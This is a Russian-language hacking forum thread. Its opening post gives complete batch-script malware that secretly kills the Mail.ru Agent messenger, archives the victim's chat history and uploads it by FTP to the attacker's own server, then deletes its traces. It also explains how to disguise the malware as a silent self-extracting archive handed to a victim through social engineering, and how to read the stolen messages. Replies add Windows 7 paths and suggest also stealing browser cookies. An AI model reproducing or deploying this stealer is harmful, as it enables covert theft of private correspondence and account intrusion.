![]() |
Для осуществления хака потребуется СИ(социальная инженерия) и сервер. Я использовал бесплатный срев на http://www.webservis.ru
Будем заливать переписку из "Mail.ru Агента" на сервер, при помощи bat файлов(Win XP) и двух утилит. Нам понадобится утилиты "Rar.exe" и "offsee.exe"(hidec) Скачать утилиту для архивации "Rar.exe" Скачать утилиту для скрытия cmd "offsee.exe" Первый бат-файл я назвал «start» его содержание: code: @echo off offsee.exe "bod.bat" exit он запускает второй батник через утилиту “hidec” с названием «offsee.exe» которая скроет консольное окно. Второй бат-файл я назвал «bod» его содержание: Спойлер @echo off set name=%usernamee%_%date% attrib +H +S "bod.bat" attrib +H +S "offsee.exe" attrib +H +S "Rar.exe" attrib +H +S "start.bat" echo open Ваш_сервер >> ftpcmd attrib +H +S "ftpcmd" echo USER Логин Пароль >> ftpcmd echo binary >> ftpcmd echo quote PASV >> ftpcmd echo cd public_html >> ftpcmd echo put "\serv\%name%-Mra.rar" >> ftpcmd echo disconnect >> ftpcmd echo close >> ftpcmd echo bye >> ftpcmd taskkill /f /t /fi "MODULES eq YLUSBTEL.dll" md "\serv" attrib +H +S "\serv" md "\serv\%name%" rd /s /q "%appdata%\Mra\Avatars" xcopy "%appdata%\Mra" "\serv\%name%" /s /c /g /h /r /y /q Rar A -r -ep1 -df -m4 "\serv\%name%-Mra.rar" "\serv\%name%" ftp -s:ftpcmd -n -v rd /s /q "\serv" attrib -H -S "ftpcmd" del /f /q "ftpcmd" attrib -H -S "Rar.exe" del /f /q "Rar.exe" attrib -H -S "start.bat" del /f /q start.bat attrib -H -S "offsee.exe" del /f /q offsee.exe del /f /q start.exe attrib -H -S "bod.bat" del /f /q %0 exit Он завершит процесс Агента, скопирует, заархивирует переписку в rar, переименует в ИмяПользователя_Дата-Mra.rar и зальёт архив на ваш сервер. Ключевые моменты: вместо «Ваш_сервер» нужно ввести адрес вашего серва. «Логин» «Пароль», соответственно то-же ваш логин и пароль. В строке del /f /q start.exe «start.exe» заменить на название фала само-распаковки(SFX-архив). Лучше, конечно, все 4 файла залить в SFX-архив, с параметрами: "Путь распаковки" - Создать в текущей папке "Программа установки, Выполнить после установки" - start.bat "Режим вывода информации" - Скрыть всё Получившиеся приложение, само-собой, нужно дать жертве, что-бы она его открыла. Украли, как прочитать? Тут два варианта: 1)В архиве, открыть файл находящийся в Mra\Base\mra.dbs с помощью программы "magent-hr3.0" Программа читает первые 1500 сообщений, а дальше нет. Скачать "magent-hr3.0" "Сайт" программы 2.1 Отключиться от интернета, установить М-Агент на комп, в папке "Mra"(%appdata%\Mra или Application Data\Mra) заменить все файлы и папки на файлы и папки из нашего архива. 2.2 Запустить М-Агент, ввести е-маил жертвы, ввести любой пароль и нажать "Сохранить пароль", далее можно смотреть полную переписку с кем угодно. PS Естественно все это работает когда у жертвы WinXp и переписка не удалена самой жертвой. PPS Будут вопросы, предложения, ошибки по моему "приложению" - пишите тут. PPPS Всё в ознакомительных целях, автор ответственности не несёт. |
А почему работает тоолько на WinXp ! а на Win 7 не работает что ли? (сейчас же почти у всех семерка?)
|
Цитата:
Сообщение от zhasulan_kz А почему работает тоолько на WinXp ! а на Win 7 не работает что ли? (сейчас же почти у всех семерка?) Должно работать, лично я не пробовал. почти... да не у всех, большинство моих знакомых "разочаровавшись" в семерке ставят себе XP. |
Отпишитесь у кого робит?
|
А если такое только на одноклассники???
|
Дорогие друзья, помогите разобраться с MAIL.RU агентом, нужна история, есть вайлы mra.dbs, пароли логины, все есть вообщем, нужно ее от туда как-то извлеч
|
не работает данная программа....
дело в том что агент с кпк... и нужна вся история |
Друзья, помогите разобраться с созданием сервера, попробовал создать на предлагаемом сайте, но в итоге пишет - "Страница в стадии разработки
зайдите позднее" . во всём остальном всё понятно . |
Можно и проще в новом выпуске хакера публиковали одну прогу.. и с ней идут(2 консольные ):
Цитата: magent_copy_kill.exe mra_read.exe Прикрутить из к батнику.. и заливать можно уже готовую историю. |
На XP и 7-ке разница в целях лазейке этой то, пути только разные, т.е. у 7-ки до архива Агента(любой версии) до History надо преодолеть:C:\Users\ИМЯ_ПОЛЬЗО АТЕЛЯ\AppData\Roaming\Mra\Base\mra.dbs,opt.d bs
На XP путь:C:\Documents and Settings\имя пользователя\Application DataMra\Base\mra.dbs,opt.dbs Только этим и отличается не работоспособность этого "виря" на 7-ке. Я бы ещё от "жертвы" несколько файлов отсюда прихватил бы:C:\Users\имя пользователя\AppData\Roaming\Mra\Updat e\russian.aff,russian.dict,russian.hash,usermade.d ict. P.S. А лучше всего, такой тулзой "cookie" уганять с браузера/ов ламера для разносторонности. |
| Время: 05:28 |